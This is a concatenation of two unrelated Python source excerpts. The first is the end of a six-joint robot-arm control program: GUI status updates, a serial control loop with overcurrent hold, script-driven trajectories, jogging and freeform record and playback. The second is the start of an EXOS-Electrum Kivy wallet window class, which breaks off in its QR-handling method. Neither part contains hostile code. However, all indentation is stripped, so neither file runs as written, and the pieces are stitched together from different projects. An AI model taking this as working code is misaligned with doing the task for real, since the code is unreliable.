ticks_label[y].configure(text="Encoder: " + str(p6[y]))
Deg_label[y].configure(text="Degree: " + str(round(rbt.RAD2D(p7[y]) ,4)) + " °")
RAD_label[y].configure(text="Radians: " + str(round(p7[y], 6))) #raw_var * 0.04394531 * (np.pi / 180, 3)
Temperature_label[y].configure(text="Temperature: " + str(p9[y]) + " ℃")
Current_label[y].configure(text="Current: " + str(round(p8[y]/1000, 5)) + " A")
pos_labels2[y].configure(text= robot_names[y] +str(round(p7[y],4 )))
for y in range(0,6):
pos_labels[y].configure(text= pos_text[y] +str(round(p10[y],4 )))
root.after(95,Stuff_To_Update) # re-schedule: update data every 95 ms
root.after(1, Stuff_To_Update)
root.mainloop()
def do_stuff(left_btns,right_btns,raw_ENC,True_rads,spd_set,acc_set,current,temperature,True_pose,RPM_speed,True_rads_speed,grav_pos,software_control,Steer_K1,Steer_K2,Steer_K3,Steer_K4):
gt.Clear_Error(1)
gt.Clear_Error(2)
gt.Clear_Error(3)
gt.Clear_Error(4)
gt.Clear_Error(5)
gt.Clear_Error(6)
time.sleep(0.01)
gt.Change_data(1,200,3000,10000)
gt.Change_data(2,200,5000,10000)
gt.Change_data(3,200,3000,10000)
gt.Change_data(4,200,3000,10000)
gt.Change_data(5,200,3000,10000)
gt.Change_data(6,200,3000,10000)
time.sleep(0.01)
# Array where freeform recorded positions are stored
freeform_record_array = np.empty(shape=(15000,6),order='C',dtype='object')
# variable that tells us how many steps we took in our freeform recording
freeform_record_len = 0
current_freefrom_step = 0
current_freefrom_step_execute = 0
matrix_array = np.empty(shape=(0,6),order='C',dtype='object')
True_pose_var = [None] * 6 # Variable that stores the robot pose. Index order: X, Y, Z, then the three Euler angles (phi, theta, psi)
hold_var = [0] * rbt.Joint_num # Hold var is 1 if robot is holding position
Direction_var = [None] * rbt.Joint_num # None for not moving, True and False for directions
# Stuff for accelerated jogging of motors
current_speed = [0] * rbt.Joint_num
acc_cntr = [0] * rbt.Joint_num
Speed_jog_setpoint = [0] * rbt.Joint_num
Acceleration_jog_setpoint = [0] * rbt.Joint_num
###################################
prev_enable_disable = 0
Sending_stuff = 0 # if it is 0 then send dummy data; if it is 1 send nothing since we are already sending useful data
prev_motor_mode_select = 1
# code execution control variables
started_execution = 0 # 0 if we are not executing script, when script is run first time it goes to 1 and stays until script stops executing
clean_string = [] # whole code of the executing script cleaned up, i.e. every blank '\n' line is removed
code_step_cntr = 0 # tells us what line of code we are executing at the moment
time_step_cntr = 0 # Tells us at what time we are at specific line of code
step_time = 0 # Tells us how long each line of code need to last
number_of_code_lines = 0 # Number of code lines in script
Security_flag = 0 # Tells us if security is triggered. 0 if not 1 if triggered
current_current_limit = rbt.Default_current_limits
security_stop_duration = rbt.Default_security_stop_duration
security_counter = 0
current_pos_command = [None]*rbt.Joint_num # if in pos mode, save the current commanded position here. It will be re-executed when security is over
current_speed_command = [None]*rbt.Joint_num # if in pos mode, save the current commanded speed here. It will be re-executed when security is over
current_command = '' # command that is being executed atm
tt = 0
while(1):
try:
bg = time.time()
# Reads all data from serial port. This function also blocks
ENC,RADS,cur,spd,spd_RAD,temp,vol,err= gt.main_comms_func()
# This gets current robot pose and write to multi proc
Enable_disable_var = software_control[0] # 0 is for disabled / 1 is for enabled
operating_mode = software_control[1]
T = robot_arm.fkine(RADS)
T2 = T*1
True_pose_var[0] = T2[0][3]
True_pose_var[1] = T2[1][3]
True_pose_var[2] = T2[2][3]
True_pose_var[3:] = T.eul('deg')
# This reads all multi process variables and writes to all multi process variables (With len of joint_num)
for y in range(0,rbt.Joint_num):
# Read multi proc
# No need for this just read the index you want
# Write multi proc
raw_ENC[y] = ENC[y]
True_rads[y] = RADS[y]
current[y] = cur[y]
temperature[y] = temp[y]
RPM_speed[y] = spd[y]
True_rads_speed[y] = spd_RAD[y]
# This reads all multi process variables and writes to all multi process variables (With len of 6)
for y in range(0,6):
# Write multi proc
True_pose[y] = True_pose_var[y]
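# Overcurrent protection: if any joint current exceeds its limit (or a stop is already active), put joints 1-3 into a strong position hold and keep counting Data_interval ticks until security_stop_duration has elapsed, then resume the last 'pos' command.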
if np.any(cur > np.array(current_current_limit)) or Security_flag == 1:
if security_counter == 0:
Security_flag = 1
gt.Strong_position_hold(1,7.5,1)
gt.Strong_position_hold(2,7.5,1)
gt.Strong_position_hold(3,7.5,1)
if security_counter >= 0 and security_counter < ((security_stop_duration / rbt.Data_interval)):
#print(security_counter)
security_counter = security_counter + 1
if security_counter == ((security_stop_duration / rbt.Data_interval)):
security_counter = 0
Security_flag = 0
if current_command == 'pos':
for y in range(0,rbt.Joint_num):
gt.GOTO_position_HOLD(y+1,current_pos_command[y],current_speed_command[y],7.5,1)
### Send dummy data when nobody else is sending data
if Sending_stuff == 0:
gt.send_dummy_data()
#print("dummy_data")
else:
#print("not_dummy_data")
None
########################
# If in teach mode
if (operating_mode == 2 or operating_mode == 0) and Enable_disable_var == 1 and Security_flag == 0:
if software_control[3] == 1: # started executing script
if started_execution == 0:
text_file = open(Image_path + "/Programs/execute_script.txt",'r')
code_string = text_file.readlines()
text_file.close()
for i in range(0,len(code_string)):
if code_string[i] == '\n':
continue
else:
clean_string.append(code_string[i])
if clean_string[len(clean_string)-1] == 'end,\n' or clean_string[len(clean_string)-1] == 'loop,\n':
valid_data = 1
else:
valid_data = 0
started_execution = 1
code_step_cntr = 0
time_step_cntr = 0
number_of_code_lines = len(clean_string)
step_time = 0
if code_step_cntr < number_of_code_lines:
Sending_stuff = 1
if time_step_cntr == 0:
code2execute = clean_string[code_step_cntr].split(',')
code2execute = code2execute[:-1]
#print(clean_string)
print(code2execute)
if(code2execute[0] == 'pos'):
step_time = float(code2execute[1]) # data after index 1 is position data and index 1 is time data
start_pos = [None]*rbt.Joint_num
stop_pos = [None]*rbt.Joint_num
current_command = 'pos'
for y in range(0,rbt.Joint_num):
start_pos[y] = True_rads[y]
stop_pos[y] = float(code2execute[y+2])
pos_var,spd_var = rbt.GO_TO_POSE(start_pos, stop_pos,step_time)
current_pos_command = pos_var
current_speed_command = spd_var
for y in range(0,rbt.Joint_num):
gt.GOTO_position_HOLD(y+1,pos_var[y],spd_var[y],7.5,1)
# send the movement commands
elif(code2execute[0] == 'CSAAR'):
step_time = float(code2execute[1]) # data after index 1 is position data and index 1 is time data
start_pos = [None]*rbt.Joint_num
stop_pos = [None]*rbt.Joint_num
current_command = 'CSAAR'
for y in range(0,rbt.Joint_num):
start_pos[y] = True_rads[y]
stop_pos[y] = float(code2execute[y+2])
matrix_array = np.empty(shape=( int( step_time / rbt.Data_interval ),6),order='C',dtype='object')
matrix_array = rbt.CSAAR(start_pos,stop_pos,step_time)
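# matrix_array now holds one row of target joint angles per Data_interval tick for the whole move; each tick streams one row to the drives via teleop_mode.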
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
elif(code2execute[0] == 'JTRAJ'):
step_time = float(code2execute[1]) # data after index 1 is position data and index 1 is time data
start_pos = [None]*rbt.Joint_num
stop_pos = [None]*rbt.Joint_num
current_command = 'JTRAJ'
for y in range(0,rbt.Joint_num):
start_pos[y] = True_rads[y]
stop_pos[y] = float(code2execute[y+2])
matrix_array = np.empty(shape=( int( step_time / rbt.Data_interval ),6),order='C',dtype='object')
temp_var = rp.tools.trajectory.jtraj(start_pos,stop_pos,int( step_time / rbt.Data_interval ))
matrix_array = temp_var.q
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
elif(code2execute[0] == 'CTRAJ'):
step_time = float(code2execute[1]) # data after index 1 is position data and index 1 is time data
start_pos = [None]*rbt.Joint_num
stop_pos = [None]*rbt.Joint_num
current_command = 'CTRAJ'
for y in range(0,rbt.Joint_num):
start_pos[y] = True_rads[y]
stop_pos[y] = float(code2execute[y+2])
matrix_array = np.empty(shape=( int( step_time / rbt.Data_interval ),6),order='C',dtype='object')
temp_var = rp.tools.trajectory.jtraj(start_pos,stop_pos,int( step_time / rbt.Data_interval ))
matrix_array = temp_var.q
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
elif(code2execute[0] == 'delay'):
current_command = 'delay'
step_time = float(code2execute[1])
gt.send_dummy_data()
elif(code2execute[0] == 'end'):
current_command = 'end'
code_step_cntr = 0
step_time = 0
time_step_cntr = 0
started_execution = 0
software_control[3] = 0
clean_string = []
elif(code2execute[0] == 'loop'):
current_command = 'loop'
code_step_cntr = 0
step_time = 0
time_step_cntr = 0
software_control[3] = 1
started_execution = 1
elif time_step_cntr > 0 and time_step_cntr < ((step_time / rbt.Data_interval)):
if(current_command == 'CSAAR'):
#print(rbt.RAD2E((matrix_array[time_step_cntr][5]),5))
#gt.teleop_mode(6,rbt.RAD2E(matrix_array[time_step_cntr][5],5),0,Steer_K1[5],Steer_K2[5],Steer_K3[5],Steer_K4[5])
#print(matrix_array)
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
elif(current_command == 'JTRAJ'):
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
else:
gt.send_dummy_data()
#print("dummy data" + str(time_step_cntr))
if time_step_cntr < ((step_time / rbt.Data_interval) ):
time_step_cntr = time_step_cntr + 1
#print(time_step_cntr)
if time_step_cntr == ((step_time / rbt.Data_interval)) and current_command != 'loop':
time_step_cntr = 0
step_time = 0
code_step_cntr = code_step_cntr + 1
elif software_control[3] == 0: # stop executing. Stops script completely, execute will rerun the script
Sending_stuff = 0
code_step_cntr = 0
step_time = 0
time_step_cntr = 0
started_execution = 0
clean_string = []
elif software_control[3] == 2: # pause executing, meaning that after you press pause press execute it will continue where it left off
Sending_stuff = 0
None
# This stuff is for enabling and disabling(gravity comp or disable) specific motors on left side panel
if prev_motor_mode_select != software_control[2]:
prev_motor_mode_select = software_control[2]
for y in range(0, rbt.Joint_num):
if grav_pos[y] == 1:
gt.Strong_position_hold(y+1,7.5,1)
if grav_pos[y] == 0 and grav_pos[6] == 1:
gt.Gravity_compensation(y+1,20,5)
if grav_pos[y] == 0 and grav_pos[6] == 0:
gt.Disable(y+1)
# Jog motors WITH acceleration
if operating_mode == 0 and Enable_disable_var == 1 and Security_flag == 0:
for y in range(0,rbt.Joint_num):
# Reads positions from sliders or slow,default,fast setting and scales for each joint
Speed_jog_setpoint[y] = np.interp(spd_set.value,[1,100],[rbt.Joint_min_speed[y],rbt.Joint_max_speed[y]])
Acceleration_jog_setpoint[y] = np.interp(acc_set.value,[1,100],[rbt.Joint_min_acc[y],rbt.Joint_max_acc[y]])
# Acceleration in negative direction of robots joint
# NOTE: directions follow right hand rule:
# * your tumb on right hand is positive direction of z axes, and fingers represent positive rotation.
# * Axes are defined by DH params
if left_btns[y] == 1 and right_btns[y] == 0:
Sending_stuff = 1
#print("jog")
current_speed[y] = rbt.Joint_min_speed[y] + acc_cntr[y] * rbt.Data_interval * Acceleration_jog_setpoint[y]
if(current_speed[y] >= Speed_jog_setpoint[y]):
current_speed[y] = Speed_jog_setpoint[y]
gt.Speed_Dir(y+1, 0 if rbt.Direction_offsets[y] == 1 else 1,rbt.RADS2RPM(current_speed[y],y))
acc_cntr[y] = acc_cntr[y] + 1
Direction_var[y] = True
hold_var[y] = 0
# Acceleration in positive direction of robots joint
if right_btns[y] == 1 and left_btns[y] == 0:
Sending_stuff = 1
#print("jog")
current_speed[y] = rbt.Joint_min_speed[y] + acc_cntr[y] * rbt.Data_interval * Acceleration_jog_setpoint[y]
if(current_speed[y] >= Speed_jog_setpoint[y]):
current_speed[y] = Speed_jog_setpoint[y]
gt.Speed_Dir(y+1, 1 if rbt.Direction_offsets[y] == 1 else 0,rbt.RADS2RPM(current_speed[y],y))
acc_cntr[y] = acc_cntr[y] + 1
Direction_var[y] = False
hold_var[y] = 0
# Deacceleration
if current_speed[y] >= rbt.Joint_min_speed[y] and left_btns[y] == 0 and right_btns[y] == 0 and hold_var[y] == 0 and Direction_var[y] != None:
Sending_stuff = 1
#print("jog")
current_speed[y] = current_speed[y] - rbt.Data_interval * Acceleration_jog_setpoint[y]
if(current_speed[y] <= rbt.Joint_min_speed[y]):
current_speed[y] = rbt.Joint_min_speed[y]
Direction_var[y] = None
if Direction_var[y] == False:
gt.Speed_Dir(y+1, 1 if rbt.Direction_offsets[y] == 1 else 0,rbt.RADS2RPM(current_speed[y],y))
elif Direction_var[y] == True:
gt.Speed_Dir(y+1, 0 if rbt.Direction_offsets[y] == 1 else 1,rbt.RADS2RPM(current_speed[y],y))
acc_cntr[y] = 0
# If no button is pressed and we stopped deaccelerating, hold position
if left_btns[y] == 0 and right_btns[y] == 0 and hold_var[y] == 0 and Direction_var[y] == None:
gt.Strong_position_hold(y+1, 7.5, 1) # these are very good values (y+1, 7.5, 1) with a 17000 update rate; kp of 10 alone is OK without current
Sending_stuff = 0
#print("jog")
#gt.Gravity_compensation(y+1,50,5)
acc_cntr[y] = 0
hold_var[y] = 1
# When we disable robot
if Enable_disable_var == 0 and prev_enable_disable == 1:
prev_enable_disable = Enable_disable_var
gt.Gravity_compensation(1,50,3)
gt.Gravity_compensation(2,50,3)
gt.Gravity_compensation(3,50,3)
gt.Gravity_compensation(4,50,3)
gt.Gravity_compensation(5,50,3)
gt.Gravity_compensation(6,50,3)
#elif grav_pos[6] == 0:
#gt.Disable(1)
#gt.Disable(2)
#gt.Disable(3)
# When we enable robot
elif Enable_disable_var == 1 and prev_enable_disable == 0:
prev_enable_disable = Enable_disable_var
for y in range(0, rbt.Joint_num):
gt.Enable(y+1)
gt.teleop_mode(y+1,raw_ENC[y],0,Steer_K1[y],Steer_K2[y],Steer_K3[y],Steer_K4[y])
#print(time.time() - bg)
# If freeform recording is on
if(software_control[4] == 1 and software_control[5] == 0):
freeform_record_array[current_freefrom_step][:] = True_rads
#print(freeform_record_array[current_freefrom_step][:])
current_freefrom_step = current_freefrom_step + 1
freeform_record_len = current_freefrom_step
# If executing freeform movement
if(software_control[4] == 0 and software_control[5] == 1):
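# Freeform playback: first GOTO the recorded start pose and wait 3 s, then stream every recorded sample through teleop_mode, one per control tick.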
if(current_freefrom_step_execute == 0):
for y in range(0,rbt.Joint_num):
gt.GOTO_position_HOLD(y+1,rbt.RAD2E(freeform_record_array[0][y],y),30,5.5,1)
#print("firstGOTO i sleep 3s")
time.sleep(3)
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(freeform_record_array[current_freefrom_step_execute][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
#print(current_freefrom_step_execute)
if(current_freefrom_step_execute == freeform_record_len - 1):
current_freefrom_step_execute = 0
software_control[5] = 0
#print("done")
if(software_control[5] == 1):
current_freefrom_step_execute = current_freefrom_step_execute + 1
# If current_freefrom_step_execute == freeform_record_len
# software_control[5] = 0
# current_freefrom_step_execute = 0
# If we want to show plot
if(software_control[6] == 1):
#print(freeform_record_len)
software_control[6] = 0
plt.plot(freeform_record_array)
plt.show()
# Clear all recorded
if(software_control[7] == 1):
software_control[7] = 0
freeform_record_array = np.empty(shape=(15000,6),order='C',dtype='object')
# variable that tells us how many steps we took in our freeform recording
freeform_record_len = 0
current_freefrom_step = 0
tt = tt + 1
if(tt == 10):
print((time.time() - bg))
tt = 0
####################################
except:
gt.try_reconnect()
def show_graph(p1, p2, p3, p4, p5, p6):
while(1):
#print(p5.value)
#print(p6.value)
if p6.value == 0:
plots.runGraph(p1,p2,p3,p4,p5.value,p6.value)
p6.value = 1
if __name__ == "__main__":
Setpoint_Speed_Proc = multiprocessing.Value('d',0) # return value of speed setpoint
Setpoint_Acc_Proc = multiprocessing.Value('d',0) # return value of acceleration setpoint
# return value of what translation button is pressed
# Variables go like this X+,X-,Y+,Y-,Z+,Z-
Translations_Proc = multiprocessing.Array("i",6, lock=False)
# Variables go from top to bottom and 1 represents pressed and 0 released
Left_btns_Proc = multiprocessing.Array("i",6, lock=False) # return value of what left button is pressed
Right_btns_Proc = multiprocessing.Array("i",6, lock=False) # return value of what right button is pressed
software_control_variables = multiprocessing.Array("i",8, lock=False) # variables are index values:
#Index 0: Enable/Disable robot. Disable places it in position hold mode, Enable allows to use other functions(jog, teach...)
# 0 is for disabled / 1 is for enabled
#Index 1: What window is open: 0 - Move, 1 - log, 2 - Teach, 3 - setup
#Index 2: variable to set motor modes in teach mode/position hold
#Index 3: Execute flag. If 1 we are executing script if 0 we are not
#Index 4: Recording freeform movement 1 is for recording 0 for not recording
#Index 5: 1 is for executing freeform movement 0 is for not executing freeform
#Index 6: Show plot 1 is to trigger show
#Index 7: Clear all recorded
grav_pos_flag = multiprocessing.Array("i",[1,1,1,1,1,1,1], lock=False) # Used to log what joints should be in gravity compensation and what should be in position hold.
# Index 6 (7th variable) is used to tell us if we are in gravity comp(1) or disable motor(0)
# These are variables we get packed in one string from master serial port
# Len is the number of joints available
p_position = multiprocessing.Array("i", rbt.Joint_num, lock=False) # Raw encoder ticks
p_position_RADS = multiprocessing.Array("d", rbt.Joint_num, lock=False) # True radians position for kinematic model
# this includes all offsets and conversions so the robot matches its kinematic model
p_speed = multiprocessing.Array("i", rbt.Joint_num, lock=False) # Raw Speed in RPM
p_speed_RADS = multiprocessing.Array("d", rbt.Joint_num, lock=False) # True speed in RAD/S
p_current = multiprocessing.Array("i", rbt.Joint_num, lock=False)
p_temperature = multiprocessing.Array("i", rbt.Joint_num, lock=False)
p_voltage = multiprocessing.Value('i',0)
p_error = multiprocessing.Value('i',0)
proc_value_show_plot = multiprocessing.Value('i',2)
proc_value_close_plot = multiprocessing.Value('i',0)
p_robot_pose = multiprocessing.Array("d", 6, lock=False) # Current pose of the robot
# Variables for Steer mode
Steer_K1 = multiprocessing.Array("d", rbt.Joint_num, lock=False)
Steer_K2 = multiprocessing.Array("d", rbt.Joint_num, lock=False)
Steer_K3 = multiprocessing.Array("d", rbt.Joint_num, lock=False)
Steer_K4 = multiprocessing.Array("d", rbt.Joint_num, lock=False)
process1 = multiprocessing.Process(target=Tkinter_GUI,args=[Setpoint_Speed_Proc,Setpoint_Acc_Proc,Translations_Proc,Left_btns_Proc,
Right_btns_Proc,p_position,p_position_RADS,p_current,p_temperature,
p_robot_pose,grav_pos_flag,software_control_variables,
Steer_K1,Steer_K2,Steer_K3,Steer_K4])
process2 = multiprocessing.Process(target=do_stuff,args=[Left_btns_Proc,Right_btns_Proc,p_position,p_position_RADS,Setpoint_Speed_Proc,
Setpoint_Acc_Proc,p_current,p_temperature,p_robot_pose,p_speed,p_speed_RADS,
grav_pos_flag,software_control_variables,Steer_K1,Steer_K2,Steer_K3,Steer_K4])
#proc_position, proc_speed, proc_current, proc_temperature, proc_plot_show, close_event
process3 = multiprocessing.Process(target=show_graph,args=[p_position_RADS,p_speed_RADS,p_current,p_temperature,proc_value_show_plot,proc_value_close_plot])
process1.start()
process2.start()
process3.start()
process1.join()
process2.join()
process3.join()
process1.terminate()
process2.terminate()
process3.terminate()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from electrum_exos.bitcoin import TYPE_ADDRESS
from electrum_exos.storage import WalletStorage
from electrum_exos.wallet import Wallet, InternalAddressCorruption
from electrum_exos.paymentrequest import InvoiceStore
from electrum_exos.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum_exos.plugin import run_hook
from electrum_exos.util import format_satoshis, format_satoshis_plain, format_fee_satoshis
from electrum_exos.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum_exos import blockchain
from electrum_exos.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_exos.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_exos.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_exos.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_exos.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register a widget cache to keep memory usage down; the timeout of 0 caches
# the data forever
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_exos.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_exos.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_exos import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'exos':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
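# Sketch of the conversion above (hypothetical numbers): with an exchange rate of
# 2.0 fiat units per coin, fiat_to_btc('1') computes int(1e8 * 1 / 2) = 50_000_000
# satoshis, which format_satoshis_plain renders as roughly '0.5' when the decimal
# point is 8.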
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Orientation of the app window. Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
title = _('EXOS-Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that updates happen at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_exos.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('exos:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_exos.transaction import Transaction
from electrum_exos.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
